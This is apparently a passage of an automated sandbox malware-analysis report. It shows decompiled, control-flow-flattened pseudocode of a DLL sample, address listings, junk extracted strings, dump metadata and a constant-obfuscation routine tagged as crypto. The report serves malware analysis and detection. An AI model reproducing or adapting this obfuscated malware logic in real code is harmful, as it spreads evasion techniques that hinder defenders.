							if(_t1469 == 0x4d97dbc) {
								_t1259 = _v396;
								_t1469 = 0xcbac970;
								_v84 = _t1259;
								continue;
							}
							__eflags = _t1469 - 0x4f2172b;
							if(_t1469 != 0x4f2172b) {
								break;
							}
							_v24 = E0087C37E();
							_t1259 = E0087BD13(_t1279, _v460, _v340, _v468, _v184);
							_t1500 = _t1500 + 0xc;
							_v20 = _t1259;
							_t1469 = 0xba8c9c0;
							continue;
						}
						if(_t1505 == 0) {
							_t1259 = E00880E63();
							__eflags = _t1259;
							if(_t1259 == 0) {
								goto L113;
							}
							_t1469 = 0xb3966a4;
							continue;
						}
						_t1506 = _t1469 - 0x1db8a88;
						if(_t1506 > 0) {
							__eflags = _t1469 - 0x223c7a9;
							if(_t1469 == 0x223c7a9) {
								_t1259 = E008817BD(_v500, _v520, _v360);
								goto L113;
							}
							__eflags = _t1469 - 0x22d34a3;
							if(_t1469 == 0x22d34a3) {
								_t1259 = E00882699();
								_t1469 = 0xa8d90c;
								continue;
							}
							__eflags = _t1469 - 0x282f66e;
							if(_t1469 == 0x282f66e) {
								_t1259 = E008630E7();
								_v88 = _t1259;
								_t1469 = 0xc53db32;
								continue;
							}
							__eflags = _t1469 - 0x32638c6;
							if(_t1469 != 0x32638c6) {
								break;
							}
							_t1259 = E00882B09(_v224, _v152, _v644, _v296);
							L29:
							_t1469 = 0x18cfb4a;
							continue;
						}
						if(_t1506 == 0) {
							_t1259 = E008677A3( &_v152, _v412, _v580, _v192,  &_v100);
							_t1500 = _t1500 + 0xc;
							asm("sbb esi, esi");
							_t1469 = ( ~_t1259 & 0x019bf65e) + 0x32638c6;
							continue;
						}
						if(_t1469 == 0x19bf82) {
							_t1287 = E0086670B();
							__eflags = _t1287;
							if(_t1287 == 0) {
								_t1259 = E0087D111();
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x05b25150) + 0x8c2c3ca;
								continue;
							}
							_t1259 = E0087D111();
							asm("sbb esi, esi");
							_t1482 =  ~_t1259 & 0xfc5df8f8;
							__eflags = _t1482;
							goto L21;
						}
						if(_t1469 == 0xa8d90c) {
							_t1259 = E00872142();
							__eflags = _t1259;
							if(_t1259 == 0) {
								goto L113;
							}
							_t1469 = 0x39ddd07;
							continue;
						}
						if(_t1469 == 0x18cfb4a) {
							__eflags = _t1466 - _v332;
							if(_t1466 == _v332) {
								L16:
								_t1469 = _t1341;
								break;
							}
							_t1259 = E00881028(_v180, _v496, E0086A40E(), _t1466, _v660, _v320);
							_t1500 = _t1500 + 0x10;
							__eflags = _t1259 - _v548;
							if(_t1259 == _v548) {
								_t1259 = E00874F74();
								goto L16;
							} else {
								_t1469 = 0x892c27a;
								continue;
							}
						}
						if(_t1469 != 0x19b3c55) {
							break;
						} else {
							_t1259 = E00882B09(_v668, _v160, _v532, _v204);
							_t1469 = 0x32638c6;
							continue;
						}
						L54:
						__eflags = _t1469 - 0xba8c9c0;
						if(__eflags > 0) {
							__eflags = _t1469 - 0xe6d4a04;
							if(__eflags > 0) {
								__eflags = _t1469 - 0xe75151a;
								if(_t1469 == 0xe75151a) {
									E0086A445();
									_t1469 = 0x8c2c3ca;
									break;
								}
								__eflags = _t1469 - 0xea72fdd;
								if(_t1469 == 0xea72fdd) {
									_t1259 = E00878D3D();
									_t1469 = 0xee19950;
									continue;
								}
								__eflags = _t1469 - 0xee19950;
								if(__eflags == 0) {
									_v168 = E00873D85(_v236, 0x861248, __eflags,  &_v164, _v416);
									_v176 = E00873D85(_v576, 0x8612a8, __eflags,  &_v172, _v228);
									_t1299 = E00879A01( &_v176,  &_v168, _v552, _v560, _v568);
									asm("sbb esi, esi");
									_t1469 = ( ~_t1299 & 0x03fcb1a4) + 0x75265a3;
									E0087FECB(_v176, _v392, _v544, _v400, _v408);
									_t1259 = E0087FECB(_v168, _v368, _v376, _v384, _v536);
									_t1500 = _t1500 + 0x34;
								}
								break;
							}
							if(__eflags == 0) {
								_t1469 = 0x41f7676;
								continue;
							}
							__eflags = _t1469 - 0xc031f76;
							if(_t1469 == 0xc031f76) {
								_t1384 = _v616;
								_t1259 = E0087E4E5(_v284,  &_v108, _v292, _v624);
								_t1500 = _t1500 + 0xc;
								__eflags = _t1259;
								if(_t1259 == 0) {
									_t1259 = _v144;
									__eflags = _t1259;
									if(_t1259 == 0) {
										_push(_t1384);
										_push(_t1384);
										_t1466 = E0087CCA0(_v252, _v592);
										_t1500 = _t1500 + 0x10;
										_t1259 = _v144;
									}
									__eflags = _t1259 - 1;
									if(_t1259 == 1) {
										_push(_t1384);
										_push(_t1384);
										_t1259 = E0087CCA0(_v424, _v432);
										_t1500 = _t1500 + 0x10;
										_t1466 = _t1259;
									}
								} else {
									_t1466 = _v608;
								}
								_t1341 = 0xc4fb15d;
								_t1469 = 0x92191f9;
								continue;
							}
							__eflags = _t1469 - 0xc4fb15d;
							if(_t1469 == 0xc4fb15d) {
								_t1259 = E00865386(_v456,  &_v56, _v632);
								_pop(_t1384);
								_t1469 = 0x1db8a88;
								continue;
							}
							__eflags = _t1469 - 0xc53db32;
							if(_t1469 == 0xc53db32) {
								_t1259 = E0087C387(_t1384);
								_v92 = _t1259;
								_t1469 = 0x4d97dbc;
								continue;
							}
							__eflags = _t1469 - 0xcbac970;
							if(_t1469 != 0xcbac970) {
								break;
							}
							_t1259 = _v316;
							_t1469 = 0xc4fb15d;
							_v44 = _t1259;
							continue;
						}
						if(__eflags == 0) {
							_t1259 = E0086F8A0();
							_v12 = _t1259;
							_t1469 = 0x282f66e;
							continue;
						}
						__eflags = _t1469 - 0x9642905;
						if(__eflags > 0) {
							__eflags = _t1469 - 0xa51fadb;
							if(_t1469 == 0xa51fadb) {
								_t1259 = E0087AD08();
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x7a1cd5a;
								continue;
							}
							__eflags = _t1469 - 0xb3966a4;
							if(_t1469 == 0xb3966a4) {
								_t1259 = E00874A66();
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x8488c7d;
								continue;
							}
							__eflags = _t1469 - 0xb4966e6;
							if(_t1469 == 0xb4966e6) {
								_t1384 = _v508;
								_t1310 = E008655FF(_t1384, _v504, _v420,  &_v160,  &_v144);
								_t1500 = _t1500 + 0xc;
								__eflags = _t1310;
								if(_t1310 != 0) {
									_t1259 = _v144;
									__eflags = _t1259 - 8;
									if(_t1259 != 8) {
										__eflags = _t1259;
										if(_t1259 == 0) {
											L79:
											_t1469 = 0xc031f76;
											continue;
										}
										__eflags = _t1259 - 1;
										if(_t1259 != 1) {
											L64:
											_t1469 = 0x19b3c55;
											continue;
										}
										goto L79;
									}
									_t1469 = 0x856f9ca;
									continue;
								}
								_push(_t1384);
								_push(_t1384);
								_t1259 = E0087CCA0(_v324, _v480);
								_t1500 = _t1500 + 0x10;
								_t1466 = _t1259;
								_t1341 = 0xc4fb15d;
								goto L64;
							}
							__eflags = _t1469 - 0xb4f1747;
							if(_t1469 != 0xb4f1747) {
								break;
							}
							E00880E63();
							_t1341 = 0x4f2172b;
							_push(_t1384);
							_push(_t1384);
							_t1259 = E0087CCA0(_v380, _v428);
							_t1500 = _t1500 + 0x10;
							_t1466 = _t1259;
							goto L29;
						}
						if(__eflags == 0) {
							_t1259 = E0087FBDE();
							_t1469 = 0xea72fdd;
							continue;
						}
						__eflags = _t1469 - 0x892c27a;
						if(_t1469 == 0x892c27a) {
							_t1259 = E0086A417(_t1384);
							goto L113;
						}
						__eflags = _t1469 - 0x8c2c3ca;
						if(_t1469 == 0x8c2c3ca) {
							_t1259 = E0087C5D5();
							_t1469 = 0x627e178;
							continue;
						}
						__eflags = _t1469 - 0x903542f;
						if(_t1469 == 0x903542f) {
							_t1259 = E0086D14C();
							_t1469 = 0x6362904;
							continue;
						}
						__eflags = _t1469 - 0x92191f9;
						if(_t1469 != 0x92191f9) {
							break;
						}
						_t1259 = E0087D111();
						__eflags = _t1259;
						if(_t1259 == 0) {
							_t1259 = E0086C6B8();
						}
						goto L64;
					}
					__eflags = _t1469 - 0x75265a3;
				} while (_t1469 != 0x75265a3);
				goto L113;
			}

0x0086863c
0x00868642
0x0086864f
0x0086865a
0x00868665
0x00868670
0x0086867b
0x00868683
0x0086868b
0x0086869c
0x008686a0
0x008686a5
0x008686ad
0x008686b8
0x008686c3
0x008686ce
0x008686e2
0x008686e7
0x008686f0
0x008686fb
0x00868706
0x00868711
0x00868718
0x00868723
0x0086872e
0x0086873d
0x00868742
0x0086874b
0x00868753
0x0086875e
0x00868769
0x00868774
0x0086877f
0x00868792
0x00868795
0x00868798
0x0086879f
0x008687aa
0x008687b5
0x008687bd
0x008687c8
0x008687d3
0x008687e6
0x008687f8
0x008687ff
0x0086880a
0x00868815
0x0086881d
0x00868828
0x00868833
0x00868849
0x00868850
0x0086885b
0x00868866
0x00868878
0x0086887b
0x00868884
0x0086888f
0x0086889a
0x008688ac
0x008688af
0x008688b0
0x008688b7
0x008688c2
0x008688d7
0x008688de
0x008688e6
0x008688f1
0x008688fc
0x00868907
0x0086890f
0x0086891a
0x00868922
0x0086892a
0x0086893a
0x0086893e
0x00868946
0x00868951
0x00868959
0x00868964
0x0086896f
0x0086897a
0x00868982
0x0086898a
0x00868995
0x008689a0
0x008689a8
0x008689b3
0x008689be
0x008689c9
0x008689d4
0x008689ea
0x008689f9
0x008689fc
0x00868a03
0x00868a0e
0x00868a1b
0x00868a1f
0x00868a2c
0x00868a30
0x00868a38
0x00868a43
0x00868a4b
0x00868a5a
0x00868a5d
0x00868a64
0x00868a6f
0x00868a7a
0x00868a85
0x00868a90
0x00868a9b
0x00868aa6
0x00868ab1
0x00868abc
0x00868ad2
0x00868ad7
0x00868ae6
0x00868aed
0x00868af8
0x00868b00
0x00868b05
0x00868b15
0x00868b19
0x00868b21
0x00868b29
0x00868b33
0x00868b37
0x00868b3c
0x00868b44
0x00868b4f
0x00868b57
0x00868b62
0x00868b6d
0x00868b78
0x00868b83
0x00868b8e
0x00868b99
0x00868ba4
0x00868baf
0x00868bba
0x00868bc5
0x00868bcd
0x00868bd5
0x00868bdd
0x00868be5
0x00868bed
0x00868bf8
0x00868c00
0x00868c07
0x00868c12
0x00868c1d
0x00868c25
0x00868c30
0x00868c3b
0x00868c46
0x00868c51
0x00868c5c
0x00868c6f
0x00868c76
0x00868c81
0x00868c89
0x00868c96
0x00868c9a
0x00868c9f
0x00868ca7
0x00868cb2
0x00868cbd
0x00868cc8
0x00868cd3
0x00868ce6
0x00868ced
0x00868cf8
0x00868d03
0x00868d0e
0x00868d22
0x00868d29
0x00868d34
0x00868d3f
0x00868d47
0x00868d4f
0x00868d54
0x00868d5c
0x00868d64
0x00868d71
0x00868d79
0x00868d84
0x00868d8f
0x00868d9a
0x00868da5
0x00868dad
0x00868db8
0x00868dc3
0x00868dce
0x00868dd6
0x00868dde
0x00868de9
0x00868dff
0x00868e08
0x00868e13
0x00868e1e
0x00868e29
0x00868e34
0x00868e3f
0x00868e4a
0x00868e55
0x00868e60
0x00868e6b
0x00868e76
0x00868e81
0x00868e8c
0x00868e97
0x00868ea2
0x00868ead
0x00868eb8
0x00868ec3
0x00868ece
0x00868ed9
0x00868ee4
0x00868eef
0x00868efa
0x00868f05
0x00868f0d
0x00868f18
0x00868f20
0x00868f2b
0x00868f37
0x00868f3c
0x00868f42
0x00868f4b
0x00868f50
0x00868f56
0x00868f5e
0x00868f66
0x00868f6b
0x00868f73
0x00868f78
0x00868f80
0x00868f92
0x00868f95
0x00868f9c
0x00868fa7
0x00868faf
0x00868fb4
0x00868fb8
0x00868fc0
0x00868fc8
0x00868fd0
0x00868fdb
0x00868fee
0x00868ff3
0x00868ffa
0x00869005
0x00869010
0x0086901b
0x00869026
0x00869031
0x0086903c
0x00869047
0x00869052
0x0086905d
0x00869068
0x00869073
0x0086907e
0x00869089
0x00869094
0x0086909f
0x008690aa
0x008690b5
0x008690c0
0x008690c8
0x008690d3
0x008690db
0x008690e0
0x008690ef
0x008690f2
0x008690f6
0x008690fe
0x00869111
0x00869118
0x00869123
0x0086912e
0x00869139
0x00869144
0x0086915a
0x00869161
0x0086916c
0x00869182
0x00869189
0x00869191
0x0086919c
0x008691a4
0x008691ac
0x008691b1
0x008691b9
0x008691c1
0x008691cc
0x008691d4
0x008691dc
0x008691e7
0x008691ef
0x008691f4
0x008691f9
0x00869201
0x00869209
0x0086921b
0x0086921e
0x00869225
0x00869230
0x0086923b
0x00869243
0x0086924b
0x00869256
0x00869261
0x0086926e
0x00869276
0x00869281
0x00869289
0x00869298
0x0086929b
0x008692a4
0x008692a8
0x008692b0
0x008692bb
0x008692c6
0x008692d1
0x008692dc
0x008692e7
0x008692f2
0x008692fd
0x0086930a
0x0086931b
0x0086931f
0x00869327
0x00869332
0x0086933a
0x00869345
0x00869350
0x0086935b
0x00869366
0x0086936d
0x00869378
0x0086938e
0x00869395
0x008693a0
0x008693ab
0x008693b3
0x008693bb
0x008693c3
0x008693c8
0x008693d0
0x008693db
0x008693e3
0x008693ee
0x008693f9
0x0086940c
0x0086940d
0x00869414
0x0086941f
0x00869427
0x0086942f
0x00869437
0x0086943f
0x00869447
0x0086944f
0x00869454
0x00869459
0x0086945e
0x00869466
0x00869471
0x0086947a
0x00869481
0x0086948c
0x00869497
0x008694a2
0x008694ad
0x008694ba
0x008694be
0x008694cb
0x008694d1
0x008694d9
0x008694e4
0x008694ef
0x008694fa
0x00869505
0x0086950d
0x00869518
0x00869520
0x00869525
0x00869529
0x0086952e
0x00869536
0x00869541
0x0086954c
0x00869557
0x00869562
0x00869577
0x0086957a
0x00869581
0x0086958c
0x00869599
0x0086959d
0x008695aa
0x008695ae
0x008695b6
0x008695c1
0x008695c9
0x008695d4
0x008695df
0x008695ea
0x008695f5
0x00869600
0x0086960b
0x00869616
0x00869621
0x0086962c
0x00869637
0x00869642
0x00869658
0x0086965f
0x0086966a
0x00869672
0x0086967e
0x00869683
0x00869689
0x00869691
0x00869699
0x008696a4
0x008696af
0x008696c1
0x008696c4
0x008696cb
0x008696d6
0x008696e1
0x008696ec
0x008696f7
0x0086970a
0x00869711
0x0086971c
0x00869724
0x0086972c
0x00869734
0x0086973c
0x00869744
0x00869751
0x0086975c
0x00869767
0x0086976f
0x00869774
0x00869779
0x00869781
0x00869789
0x00869794
0x0086979f
0x008697aa
0x008697c0
0x008697c9
0x008697d4
0x008697df
0x008697ea
0x008697f2
0x008697fd
0x00869805
0x0086980a
0x0086980f
0x00869817
0x0086981f
0x0086982a
0x00869835
0x00869840
0x0086984b
0x00869856
0x00869861
0x0086986c
0x00869874
0x0086987c
0x00869887
0x00869892
0x0086989d
0x008698a8
0x008698b3
0x008698be
0x008698c9
0x008698db
0x008698e0
0x008698e9
0x008698f4
0x00869907
0x0086990a
0x00869919
0x00869920
0x0086992b
0x00869941
0x00869948
0x00869953
0x0086995f
0x00869962
0x00869966
0x0086996b
0x00869973
0x0086997b
0x00869986
0x0086998e
0x00869996
0x008699a1
0x008699ac
0x008699b7
0x008699bf
0x008699cc
0x008699dc
0x008699e7
0x008699f2
0x008699fd
0x00869a05
0x00869a10
0x00869a24
0x00869a29
0x00869a30
0x00869a37
0x00869a42
0x00869a4d
0x00869a55
0x00869a5d
0x00869a65
0x00869a6a
0x00869a72
0x00869a7d
0x00869a88
0x00869a93
0x00869aa7
0x00869aac
0x00869ab3
0x00869ac3
0x00869aca
0x00869aca
0x00869ad5
0x00869ad5
0x00869ad5
0x00869ad5
0x00869adb
0x00869adb
0x00869ae1
0x00869ae1
0x0086a3f3
0x0086a406
0x0086a40d
0x0086a40d
0x00869ae7
0x00869aed
0x00869d2c
0x00869d32
0x00869e70
0x00869e76
0x00869f12
0x00869f17
0x00869ad5
0x00869ad5
0x00869ad5
0x00869adb
0x00869adb
0x00000000
0x00869adb
0x00000000
0x00869ad5
0x00869e7c
0x00869e82
0x00869efc
0x00869f01
0x00000000
0x00869f01
0x00869e84
0x00869e8a
0x00869ed0
0x00869edc
0x00869ee5
0x00869eed
0x00000000
0x00869eed
0x00869e8c
0x00869e92
0x00000000
0x00000000
0x00869ea6
0x00869eaf
0x00869eb7
0x00000000
0x00869eb7
0x00869d38
0x00869e5a
0x00869e63
0x00869e65
0x00869c17
0x00869c17
0x00000000
0x00869c17
0x00869d3e
0x00869d44
0x00869e3c
0x00869e41
0x00869e43
0x00000000
0x00000000
0x00869e49
0x00000000
0x00869e49
0x00869d4a
0x00869d50
0x00869e0f
0x00869e14
0x00869e1b
0x00869e23
0x00000000
0x00869e23
0x00869d52
0x00869d58
0x00869db7
0x00869dbe
0x00869dc3
0x00000000
0x00869dc3
0x00869d5a
0x00869d60
0x00000000
0x00000000
0x00869d82
0x00869d9e
0x00869da3
0x00869da6
0x00869dad
0x00000000
0x00869dad
0x00869af3
0x00869d15
0x00869d1a
0x00869d1c
0x00000000
0x00000000
0x00869d22
0x00000000
0x00869d22
0x00869af9
0x00869aff
0x00869c82
0x00869c88
0x0086a3dc
0x00000000
0x0086a3e2
0x00869c8e
0x00869c94
0x00869cf8
0x00869cfd
0x00000000
0x00869cfd
0x00869c96
0x00869c9c
0x00869cdb
0x00869ce0
0x00869ce7
0x00000000
0x00869ce7
0x00869c9e
0x00869ca4
0x00000000
0x00000000
0x00869cc3
0x00869cca
0x00869cca
0x00000000
0x00869cca
0x00869b05
0x00869c63
0x00869c68
0x00869c6f
0x00869c77
0x00000000
0x00869c77
0x00869b11
0x00869bf6
0x00869bfb
0x00869bfd
0x00869c26
0x00869c2f
0x00869c37
0x00000000
0x00869c37
0x00869c06
0x00869c0f
0x00869c11
0x00869c11
0x00000000
0x00869c11
0x00869b1d
0x00869bd1
0x00869bd6
0x00869bd8
0x00000000
0x00000000
0x00869bde
0x00000000
0x00869bde
0x00869b29
0x00869b61
0x00869b68
0x00869bbc
0x00869bbc
0x00000000
0x00869bbc
0x00869b95
0x00869b9a
0x00869b9d
0x00869ba4
0x00869bb7
0x00000000
0x00869ba6
0x00869ba6
0x00000000
0x00869ba6
0x00869ba4
0x00869b31
0x00000000
0x00869b37
0x00869b50
0x00869b57
0x00000000
0x00869b57
0x00869f21
0x00869f21
0x00869f27
0x0086a137
0x0086a13d
0x0086a284
0x0086a28a
0x0086a3af
0x0086a3b4
0x00000000
0x0086a3b4
0x0086a290
0x0086a296
0x0086a399
0x0086a39e
0x00000000
0x0086a39e
0x0086a29c
0x0086a2a2
0x0086a2db
0x0086a2fd
0x0086a319
0x0086a325
0x0086a33b
0x0086a356
0x0086a381
0x0086a386
0x0086a386
0x00000000
0x0086a2a2
0x0086a143
0x0086a27a
0x00000000
0x0086a27a
0x0086a149
0x0086a14f
0x0086a1dd
0x0086a1e2
0x0086a1e7
0x0086a1ea
0x0086a1ec
0x0086a1f4
0x0086a1fb
0x0086a1fd
0x0086a218
0x0086a219
0x0086a22a
0x0086a22c
0x0086a22f
0x0086a22f
0x0086a236
0x0086a239
0x0086a254
0x0086a255
0x0086a264
0x0086a269
0x0086a26c
0x0086a26c
0x0086a1ee
0x0086a1ee
0x0086a1ee
0x0086a26e
0x0086a270
0x00000000
0x0086a270
0x0086a151
0x0086a153
0x0086a1b4
0x0086a1b9
0x0086a1ba
0x00000000
0x0086a1ba
0x0086a155
0x0086a15b
0x0086a18c
0x0086a191
0x0086a198
0x00000000
0x0086a198
0x0086a15d
0x0086a163
0x00000000
0x00000000
0x0086a169
0x0086a170
0x0086a172
0x00000000
0x0086a172
0x00869f2d
0x0086a121
0x0086a126
0x0086a12d
0x00000000
0x0086a12d
0x00869f33
0x00869f39
0x00869fd2
0x00869fd8
0x0086a106
0x0086a10b
0x0086a10d
0x00000000
0x00000000
0x0086a113
0x00000000
0x0086a113
0x00869fde
0x00869fe4
0x0086a0e4
0x0086a0e9
0x0086a0eb
0x00000000
0x00000000
0x0086a0f1
0x00000000
0x0086a0f1
0x00869fea
0x00869ff0
0x0086a066
0x0086a06d
0x0086a072
0x0086a075
0x0086a077
0x0086a0b0
0x0086a0b7
0x0086a0ba
0x0086a0c6
0x0086a0c8
0x0086a0d3
0x0086a0d3
0x00000000
0x0086a0d3
0x0086a0ca
0x0086a0cd
0x00869f85
0x00869f85
0x00000000
0x00869f85
0x00000000
0x0086a0cd
0x0086a0bc
0x00000000
0x0086a0bc
0x0086a08f
0x0086a090
0x0086a09f
0x0086a0a4
0x0086a0a7
0x0086a0a9
0x00000000
0x0086a0a9
0x00869ff2
0x00869ff8
0x00000000
0x00000000
0x0086a00c
0x0086a015
0x0086a029
0x0086a02a
0x0086a039
0x0086a03e
0x0086a041
0x00000000
0x0086a041
0x00869f3f
0x00869fc3
0x00869fc8
0x00000000
0x00869fc8
0x00869f41
0x00869f47
0x0086a401
0x00000000
0x0086a401
0x00869f4d
0x00869f53
0x00869fb0
0x00869fb5
0x00000000
0x00869fb5
0x00869f55
0x00869f5b
0x00869f9a
0x00869f9f
0x00000000
0x00869f9f
0x00869f5d
0x00869f63
0x00000000
0x00000000
0x00869f70
0x00869f75
0x00869f77
0x00869f80
0x00869f80
0x00000000
0x00869f77
0x0086a3b9
0x0086a3b9
0x00000000

Strings

3}, xrefs: 00869789
S, xrefs: 0086A185
.MZ, xrefs: 008696D6
C", xrefs: 00868CBD
+>, xrefs: 00869861
W?n, xrefs: 00868BF8
|V, xrefs: 00868D29
Uj`, xrefs: 008694FA
Jvmw, xrefs: 00868BDD
Tvs, xrefs: 00868C30
"{6, xrefs: 00869471
;w, xrefs: 00868B19
AW, xrefs: 00869A55
C, xrefs: 00869734
s2O, xrefs: 00869953
t, xrefs: 008693E3
Q2N, xrefs: 00868DC3
Kx!, xrefs: 0086997B
LNe, xrefs: 008691B9
F, xrefs: 008690E0
_1, xrefs: 00869781
E, xrefs: 00868CF8
jmI, xrefs: 00868FAF
t0+, xrefs: 0086879F
Reo, xrefs: 008692FD
L}, xrefs: 00869139
XG, xrefs: 00868FFA
/1, xrefs: 008693BB
BO6, xrefs: 008699BF
C", xrefs: 0086878A
08s%, xrefs: 0086865A

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
API String ID: 0-3734606162
Opcode ID: eb576e091859712a4bd9a2fd77a361c3d054a0d59d25b015f92b0b3c094ac837
Instruction ID: 22a10659289f4a868a198be0fbcae8bb1323b31cc1cf5ce2accd9d50210bb89d
Opcode Fuzzy Hash: eb576e091859712a4bd9a2fd77a361c3d054a0d59d25b015f92b0b3c094ac837
Instruction Fuzzy Hash: EAE200719083818BD378CF25C58AADBBBE1FB85318F11891DE5DE96260DBB18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0086A871, Relevance: 24.4, Strings: 19, Instructions: 646
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0086A871(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				unsigned int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t743;
				signed int _t758;
				void* _t761;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t783;
				void* _t804;
				void* _t861;
				signed int _t865;
				void* _t867;
				signed int* _t868;
				void* _t874;

				_t868 =  &_v2932;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x74b642;
				_v2776 = 0xf885ca;
				_v2776 = _v2776 | 0xffdfd4be;
				_v2776 = _v2776 ^ 0xffffd5d7;
				_v2704 = 0xd88538;
				_v2704 = _v2704 + 0xebcf;
				_v2704 = _v2704 ^ 0x00c97107;
				_v2800 = 0xd52646;
				_v2800 = _v2800 ^ 0xe8dc52fe;
				_v2800 = _v2800 + 0xffffe935;
				_v2800 = _v2800 ^ 0xe804d8f6;
				_v2688 = 0xbafe67;
				_v2688 = _v2688 + 0x9481;
				_v2688 = _v2688 ^ 0x00b13019;
				_v2884 = 0x3d12e1;
				_v2884 = _v2884 << 1;
				_v2884 = _v2884 * 0x55;
				_t867 = __ecx;
				_t861 = 0xbf2cce3;
				_t763 = 0x73;
				_v2884 = _v2884 * 0xf;
				_v2884 = _v2884 ^ 0x605e8f7b;
				_v2696 = 0xf649d9;
				_v2696 = _v2696 / _t763;
				_v2696 = _v2696 ^ 0x000dd9df;
				_v2764 = 0x4a6242;
				_v2764 = _v2764 + 0xffff45cb;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000572e2;
				_v2784 = 0x8333a2;
				_t764 = 0x2e;
				_v2784 = _v2784 / _t764;
				_v2784 = _v2784 + 0xffffe135;
				_v2784 = _v2784 ^ 0x0005b928;
				_v2852 = 0xf9a739;
				_v2852 = _v2852 | 0x42d1f5c6;
				_v2852 = _v2852 + 0xfffff01c;
				_v2852 = _v2852 ^ 0x42f87d02;
				_v2896 = 0x31e192;
				_v2896 = _v2896 << 0xa;
				_v2896 = _v2896 << 0xa;
				_t765 = 0xb;
				_v2896 = _v2896 * 0x26;
				_v2896 = _v2896 ^ 0xbac011ee;
				_v2928 = 0xcde58e;
				_v2928 = _v2928 | 0x2bdbfaea;
				_v2928 = _v2928 << 8;
				_v2928 = _v2928 | 0x4ddc4764;
				_v2928 = _v2928 ^ 0xdffb1335;
				_v2740 = 0xd63953;
				_v2740 = _v2740 + 0x5c5c;
				_v2740 = _v2740 ^ 0x00d7db1f;
				_v2844 = 0x6db889;
				_v2844 = _v2844 + 0x1eed;
				_v2844 = _v2844 / _t765;
				_v2844 = _v2844 ^ 0x0002c3cf;
				_v2796 = 0x98820d;
				_v2796 = _v2796 | 0x8cff8acf;
				_t766 = 0x43;
				_v2796 = _v2796 / _t766;
				_v2796 = _v2796 ^ 0x021946ce;
				_v2668 = 0x18627d;
				_t767 = 7;
				_v2668 = _v2668 / _t767;
				_v2668 = _v2668 ^ 0x00044156;
				_v2772 = 0x2c7378;
				_v2772 = _v2772 >> 0xb;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 ^ 0x000b6d9a;
				_v2880 = 0xd4c7fd;
				_t768 = 0x7b;
				_v2880 = _v2880 / _t768;
				_v2880 = _v2880 + 0xffffaacc;
				_t769 = 0x22;
				_v2880 = _v2880 * 0x2f;
				_v2880 = _v2880 ^ 0x00480dcd;
				_v2920 = 0xe4d6f8;
				_v2920 = _v2920 * 0x42;
				_v2920 = _v2920 + 0xa0b6;
				_v2920 = _v2920 << 8;
				_v2920 = _v2920 ^ 0x000574ec;
				_v2640 = 0xd6ae6b;
				_v2640 = _v2640 | 0xbe6f316b;
				_v2640 = _v2640 ^ 0xbefadf9c;
				_v2836 = 0x6fb4;
				_v2836 = _v2836 + 0xffffc368;
				_v2836 = _v2836 >> 0x10;
				_v2836 = _v2836 ^ 0x0009680a;
				_v2724 = 0x8b61bc;
				_v2724 = _v2724 * 0x75;
				_v2724 = _v2724 ^ 0x3fbdc7d4;
				_v2912 = 0x753704;
				_v2912 = _v2912 >> 0xb;
				_v2912 = _v2912 + 0xd457;
				_v2912 = _v2912 << 1;
				_v2912 = _v2912 ^ 0x000d652f;
				_v2716 = 0xde59a0;
				_v2716 = _v2716 + 0xffff5778;
				_v2716 = _v2716 ^ 0x00d8a7a4;
				_v2752 = 0x428dcf;
				_v2752 = _v2752 / _t769;
				_v2752 = _v2752 | 0x08d5d60c;
